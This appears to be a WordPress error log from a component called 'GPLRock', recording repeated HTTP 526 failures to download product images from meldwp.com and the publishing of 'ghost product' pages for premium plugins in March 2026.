GPLRock: Image download failed for product sumo-affiliates-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:02:00 UTC] GPLRock: Image download failed for product sumo-affiliates-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:02:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-affiliates-for-woocommerce-4538.webp for product sumo-affiliates-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:02:03 UTC] GPLRock: Image download failed for product sumo-affiliates-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:02:05 UTC] GPLRock: Image download failed for product sumo-affiliates-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:02:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-affiliates-for-woocommerce-4538.webp for product sumo-affiliates-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:02:07 UTC] GPLRock WARNING: Image download failed for product sumo-affiliates-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/sumo-affiliates-for-woocommerce-4538.webp [12-Mar-2026 03:02:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sumo-affiliates-for-woocommerce [13-Mar-2026 01:46:45 UTC] GPLRock: Image download failed for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:47 UTC] GPLRock: Image download failed for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor-13625.webp for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:46:50 UTC] GPLRock: Image download failed for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:52 UTC] GPLRock: Image download failed for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor-13625.webp for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:46:54 UTC] GPLRock WARNING: Image download failed for product wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor. URL: https://meldwp.com/wp-content/uploads/wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor-13625.webp [13-Mar-2026 01:46:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-ssplayer-sound-player-plugin-for-wpbakery-and-elementor [13-Mar-2026 01:46:55 UTC] GPLRock: Image download failed for product live-chat-experience (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:57 UTC] GPLRock: Image download failed for product live-chat-experience (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:46:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/live-chat-experience-33667.webp for product live-chat-experience after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:46:59 UTC] GPLRock: Image download failed for product live-chat-experience (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:01 UTC] GPLRock: Image download failed for product live-chat-experience (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/live-chat-experience-33667.webp for product live-chat-experience after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:04 UTC] GPLRock WARNING: Image download failed for product live-chat-experience. URL: https://meldwp.com/wp-content/uploads/live-chat-experience-33667.webp [13-Mar-2026 01:47:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: live-chat-experience [13-Mar-2026 01:47:04 UTC] GPLRock: Image download failed for product woocommerce-quick-resort-hotel-booking-calendar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:06 UTC] GPLRock: Image download failed for product woocommerce-quick-resort-hotel-booking-calendar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-resort--hotel-booking-calendar-17920.webp for product woocommerce-quick-resort-hotel-booking-calendar after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:08 UTC] GPLRock: Image download failed for product woocommerce-quick-resort-hotel-booking-calendar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:11 UTC] GPLRock: Image download failed for product woocommerce-quick-resort-hotel-booking-calendar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-resort--hotel-booking-calendar-17920.webp for product woocommerce-quick-resort-hotel-booking-calendar after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:13 UTC] GPLRock WARNING: Image download failed for product woocommerce-quick-resort-hotel-booking-calendar. URL: https://meldwp.com/wp-content/uploads/woocommerce-quick-resort--hotel-booking-calendar-17920.webp [13-Mar-2026 01:47:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-quick-resort-hotel-booking-calendar [13-Mar-2026 01:47:13 UTC] GPLRock: Image download failed for product gocardless-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:15 UTC] GPLRock: Image download failed for product gocardless-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gocardless-payment-gateway-for-woocommerce-3826.webp for product gocardless-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:17 UTC] GPLRock: Image download failed for product gocardless-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:20 UTC] GPLRock: Image download failed for product gocardless-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gocardless-payment-gateway-for-woocommerce-3826.webp for product gocardless-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:22 UTC] GPLRock WARNING: Image download failed for product gocardless-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/gocardless-payment-gateway-for-woocommerce-3826.webp [13-Mar-2026 01:47:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gocardless-payment-gateway-for-woocommerce [13-Mar-2026 01:47:22 UTC] GPLRock: Image download failed for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:24 UTC] GPLRock: Image download failed for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whmcs-pricing-sliders-and-comparison-tables---whmpress-addon-11555.webp for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:27 UTC] GPLRock: Image download failed for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:29 UTC] GPLRock: Image download failed for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whmcs-pricing-sliders-and-comparison-tables---whmpress-addon-11555.webp for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:31 UTC] GPLRock WARNING: Image download failed for product whmcs-pricing-sliders-and-comparison-tables-whmpress-addon. URL: https://meldwp.com/wp-content/uploads/whmcs-pricing-sliders-and-comparison-tables---whmpress-addon-11555.webp [13-Mar-2026 01:47:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whmcs-pricing-sliders-and-comparison-tables-whmpress-addon [13-Mar-2026 01:47:31 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:33 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-gallery-menu-for-elementor-13515.webp for product post-gallery-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [13-Mar-2026 01:47:36 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Mar-2026 01:47:38 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:34:59 UTC] GPLRock: Image download failed for product halloween-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:01 UTC] GPLRock: Image download failed for product elementor-off-canvas-menu-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:01 UTC] GPLRock: Image download failed for product halloween-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:03 UTC] GPLRock: Image download failed for product elementor-off-canvas-menu-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halloween-rain---wordpress-plugin-1530.webp for product halloween-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:04 UTC] GPLRock: Image download failed for product halloween-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-off-canvas-menu-plugin-14362.webp for product elementor-off-canvas-menu-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:05 UTC] GPLRock: Image download failed for product elementor-off-canvas-menu-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:06 UTC] GPLRock: Image download failed for product halloween-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:07 UTC] GPLRock: Image download failed for product elementor-off-canvas-menu-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halloween-rain---wordpress-plugin-1530.webp for product halloween-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:08 UTC] GPLRock WARNING: Image download failed for product halloween-rain-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/halloween-rain---wordpress-plugin-1530.webp [14-Mar-2026 01:35:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: halloween-rain-wordpress-plugin [14-Mar-2026 01:35:08 UTC] GPLRock: Image download failed for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-off-canvas-menu-plugin-14362.webp for product elementor-off-canvas-menu-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:09 UTC] GPLRock WARNING: Image download failed for product elementor-off-canvas-menu-plugin. URL: https://meldwp.com/wp-content/uploads/elementor-off-canvas-menu-plugin-14362.webp [14-Mar-2026 01:35:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-off-canvas-menu-plugin [14-Mar-2026 01:35:10 UTC] GPLRock: Image download failed for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:11 UTC] GPLRock: Image download failed for product textlocal-for-latepoint-sms-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketking---ultimate-multi-vendor-marketplace-plugin-for-woocommerce-10447.webp for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:12 UTC] GPLRock: Image download failed for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:13 UTC] GPLRock: Image download failed for product textlocal-for-latepoint-sms-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:14 UTC] GPLRock: Image download failed for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/textlocal-for-latepoint-sms-addon-29184.webp for product textlocal-for-latepoint-sms-addon after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:15 UTC] GPLRock: Image download failed for product textlocal-for-latepoint-sms-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketking---ultimate-multi-vendor-marketplace-plugin-for-woocommerce-10447.webp for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:17 UTC] GPLRock WARNING: Image download failed for product marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/marketking---ultimate-multi-vendor-marketplace-plugin-for-woocommerce-10447.webp [14-Mar-2026 01:35:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marketking-ultimate-multi-vendor-marketplace-plugin-for-woocommerce [14-Mar-2026 01:35:17 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-email-reminder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:18 UTC] GPLRock: Image download failed for product textlocal-for-latepoint-sms-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:19 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-email-reminder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/textlocal-for-latepoint-sms-addon-29184.webp for product textlocal-for-latepoint-sms-addon after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:20 UTC] GPLRock WARNING: Image download failed for product textlocal-for-latepoint-sms-addon. URL: https://meldwp.com/wp-content/uploads/textlocal-for-latepoint-sms-addon-29184.webp [14-Mar-2026 01:35:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: textlocal-for-latepoint-sms-addon [14-Mar-2026 01:35:20 UTC] GPLRock: Image download failed for product woocommerce-customer-specific-pricing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-email-reminder-32245.webp for product woocommerce-abandoned-cart-email-reminder after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:21 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-email-reminder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:22 UTC] GPLRock: Image download failed for product woocommerce-customer-specific-pricing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:23 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-email-reminder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-specific-pricing-plugin-27984.webp for product woocommerce-customer-specific-pricing-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:25 UTC] GPLRock: Image download failed for product woocommerce-customer-specific-pricing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-email-reminder-32245.webp for product woocommerce-abandoned-cart-email-reminder after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:25 UTC] GPLRock WARNING: Image download failed for product woocommerce-abandoned-cart-email-reminder. URL: https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-email-reminder-32245.webp [14-Mar-2026 01:35:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-abandoned-cart-email-reminder [14-Mar-2026 01:35:26 UTC] GPLRock: Image download failed for product woocommerce-product-builder-custom-pc-builder-product-configurator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:27 UTC] GPLRock: Image download failed for product woocommerce-customer-specific-pricing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:28 UTC] GPLRock: Image download failed for product woocommerce-product-builder-custom-pc-builder-product-configurator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-specific-pricing-plugin-27984.webp for product woocommerce-customer-specific-pricing-plugin after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:29 UTC] GPLRock WARNING: Image download failed for product woocommerce-customer-specific-pricing-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-customer-specific-pricing-plugin-27984.webp [14-Mar-2026 01:35:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-customer-specific-pricing-plugin [14-Mar-2026 01:35:29 UTC] GPLRock: Image download failed for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-builder---custom-pc-builder---product-configurator-16304.webp for product woocommerce-product-builder-custom-pc-builder-product-configurator after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:30 UTC] GPLRock: Image download failed for product woocommerce-product-builder-custom-pc-builder-product-configurator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:31 UTC] GPLRock: Image download failed for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:32 UTC] GPLRock: Image download failed for product woocommerce-product-builder-custom-pc-builder-product-configurator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calendarista-premium---wp-reservation-booking--appointment-booking-plugin--sched-3128.webp for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:33 UTC] GPLRock: Image download failed for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-builder---custom-pc-builder---product-configurator-16304.webp for product woocommerce-product-builder-custom-pc-builder-product-configurator after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:34 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-builder-custom-pc-builder-product-configurator. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-builder---custom-pc-builder---product-configurator-16304.webp [14-Mar-2026 01:35:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-builder-custom-pc-builder-product-configurator [14-Mar-2026 01:35:34 UTC] GPLRock: Image download failed for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:35 UTC] GPLRock: Image download failed for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:36 UTC] GPLRock: Image download failed for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calendarista-premium---wp-reservation-booking--appointment-booking-plugin--sched-3128.webp for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:37 UTC] GPLRock WARNING: Image download failed for product calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system. URL: https://meldwp.com/wp-content/uploads/calendarista-premium---wp-reservation-booking--appointment-booking-plugin--sched-3128.webp [14-Mar-2026 01:35:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: calendarista-premium-wp-reservation-booking-appointment-booking-plugin-schedule-booking-system [14-Mar-2026 01:35:38 UTC] GPLRock: Image download failed for product wordpress-form-builder-plugin-contact-form-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jblog-elements---magazine--blog-add-ons-for-elementor--wpbakery-page-builder-12493.webp for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:39 UTC] GPLRock: Image download failed for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:40 UTC] GPLRock: Image download failed for product wordpress-form-builder-plugin-contact-form-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:41 UTC] GPLRock: Image download failed for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-form-builder-plugin-contact-form---arforms-31367.webp for product wordpress-form-builder-plugin-contact-form-arforms after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jblog-elements---magazine--blog-add-ons-for-elementor--wpbakery-page-builder-12493.webp for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:43 UTC] GPLRock WARNING: Image download failed for product jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/jblog-elements---magazine--blog-add-ons-for-elementor--wpbakery-page-builder-12493.webp [14-Mar-2026 01:35:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jblog-elements-magazine-blog-add-ons-for-elementor-wpbakery-page-builder [14-Mar-2026 01:35:44 UTC] GPLRock: Image download failed for product wordpress-form-builder-plugin-contact-form-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:45 UTC] GPLRock: Image download failed for product final-user-wp-front-end-user-profiles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:46 UTC] GPLRock: Image download failed for product wordpress-form-builder-plugin-contact-form-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:47 UTC] GPLRock: Image download failed for product final-user-wp-front-end-user-profiles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-form-builder-plugin-contact-form---arforms-31367.webp for product wordpress-form-builder-plugin-contact-form-arforms after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:48 UTC] GPLRock WARNING: Image download failed for product wordpress-form-builder-plugin-contact-form-arforms. URL: https://meldwp.com/wp-content/uploads/wordpress-form-builder-plugin-contact-form---arforms-31367.webp [14-Mar-2026 01:35:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-form-builder-plugin-contact-form-arforms [14-Mar-2026 01:35:49 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoices-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/final-user---wp-front-end-user-profiles-1354.webp for product final-user-wp-front-end-user-profiles after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:49 UTC] GPLRock: Image download failed for product final-user-wp-front-end-user-profiles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:51 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoices-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:51 UTC] GPLRock: Image download failed for product final-user-wp-front-end-user-profiles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoices-pro-4058.webp for product woocommerce-pdf-invoices-pro after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:53 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoices-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/final-user---wp-front-end-user-profiles-1354.webp for product final-user-wp-front-end-user-profiles after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:53 UTC] GPLRock WARNING: Image download failed for product final-user-wp-front-end-user-profiles. URL: https://meldwp.com/wp-content/uploads/final-user---wp-front-end-user-profiles-1354.webp [14-Mar-2026 01:35:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: final-user-wp-front-end-user-profiles [14-Mar-2026 01:35:54 UTC] GPLRock: Image downloaded successfully for product flatfolio-flat-cool-wp-portfolio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3916b81e.webp [14-Mar-2026 01:35:54 UTC] GPLRock: Using pre-downloaded image for product flatfolio-flat-cool-wp-portfolio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3916b81e.webp [14-Mar-2026 01:35:54 UTC] GPLRock: Ghost product published with image - Product ID: flatfolio-flat-cool-wp-portfolio [14-Mar-2026 01:35:54 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-center-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:55 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoices-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:35:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoices-pro-4058.webp for product woocommerce-pdf-invoices-pro after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:35:57 UTC] GPLRock WARNING: Image download failed for product woocommerce-pdf-invoices-pro. URL: https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoices-pro-4058.webp [14-Mar-2026 01:35:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pdf-invoices-pro [14-Mar-2026 01:35:57 UTC] GPLRock: Image downloaded successfully for product dokan-vendor-total-sales (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e24e68a.webp [14-Mar-2026 01:35:57 UTC] GPLRock: Using pre-downloaded image for product dokan-vendor-total-sales: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e24e68a.webp [14-Mar-2026 01:35:57 UTC] GPLRock: Ghost product published with image - Product ID: dokan-vendor-total-sales [14-Mar-2026 01:35:58 UTC] GPLRock: Image download failed for product social-share-page-views-addon-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:00 UTC] GPLRock: Image download failed for product social-share-page-views-addon-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-page-views-addon---wordpress-28633.webp for product social-share-page-views-addon-wordpress after 3 attempts. 